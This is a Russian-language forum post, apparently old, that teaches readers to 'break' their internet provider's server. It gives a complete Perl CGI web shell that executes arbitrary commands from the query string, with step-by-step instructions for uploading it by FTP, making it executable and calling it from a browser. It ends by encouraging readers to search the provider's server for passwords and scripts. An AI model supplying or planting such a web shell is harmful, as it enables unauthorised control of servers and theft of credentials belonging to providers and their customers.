Здравствуйте форумчане!
Все мы выходим в инет. Кто-то по выделенке, а кто-то юзая модем и телефонную линию (Dial-up). У всех есть свой провайдер, но далеко не каждый предоставляет халявный инет .
Такого нехорошего провайдера нада ломать дабы насладиться халявой.
Все провайдеры также деляться на тех, кто с охотой и без злого умысла предоставляет тебе шелл-аккаунт (для тех, кто в танке: шелл - это удалённое администрирование сервака твоего прова, с помощью какой либо программы-диалога, например /bin/bash) и на тех, кто их не предоставляет ни за какие деньги (мне не повезло, мне попался именно такой пров). Но даже в этом случае не надо отчаиваться. Итак, провайдер тебе предоставил 10 мегабайт под твою личную домашнюю страничку и Ftp-аккаунт. Это нам и необходимо.
Тебе нужно написать perl-скрипт для управления серваком твоего провайдера (подразумевается, что в качестве www-сервера у твоего прова установлен Apache&perl: наиболее популярный вариант). Не бойся, написать его очень просто. Окрывай блокнот aka notepad.exe и набивай туда текст:
#!/usr/bin/perl
print "Content-type: text/htmlnn";
$cmd=$ENV{QUERY_STRING}; # Присваиваем переменной "cmd" аргументам скрипта.
@tmp=split(/%20/,$cmd); # Заводим массив "tmp" в котором хранятся разбитые по пробелам строки из переменной "cmd".
$cmd=join(" ",@tmp); # Обновляем переменную "cmd", заменяя все закодированные броузером пробелы (%20) на обычные.
@output=`$cmd`; # Выполняем команду "cmd" на сервере и записываем её результат в массив "output".
print "
n";
foreach (@output) {
print "$_"; # Выводим результат на экран.
}
print "
";
Сохрани это чудо под именем "test.pl" и залей его на сервер в в ascii-режиме (иначе ничего работать не будет). Чтобы перейти к ascii-режиму, отправляй команду Ftp-серверу: "TYPE A".
Всё просто. Скрипт выполняют команду, которая передаётся через QUERY_STRING. Но, перед тем как протестировать скрипт, нужно сделать его исполняемым. Для этого смени его атрибуты на "755" (если не можешь найти, где сменить их, отправь команду "site chmod 755 test.pl" на Ftp-сервер.
Если всё прошло удачно, запускай броузер и набирай в нём: "http://www.your_provider.com/путь_к_директории_скрипта/test.pl?whoami". Скрипт должен выдать одно слово "nobody" (если конечно тупой админ не запустил www-сервер на рут-правах ). Если на экране ничего не появилось, либо появилось сообщение об ошибке 500, значит ты допустил ошибку в скрипте. Если вылезла ошибка 403, то на скрипте нет атрибута выполнения.
Итак, теперь ты можешь удалённо управлять сервером твоего провайдера. Фантазия тут безгранична. Лазай по FTP прова, ищи пароли, скрипты и прочие интересные вещи.=)
С уважением ARMED.
_________________ Сунетесь к лучшим-умрете всей кучей!
|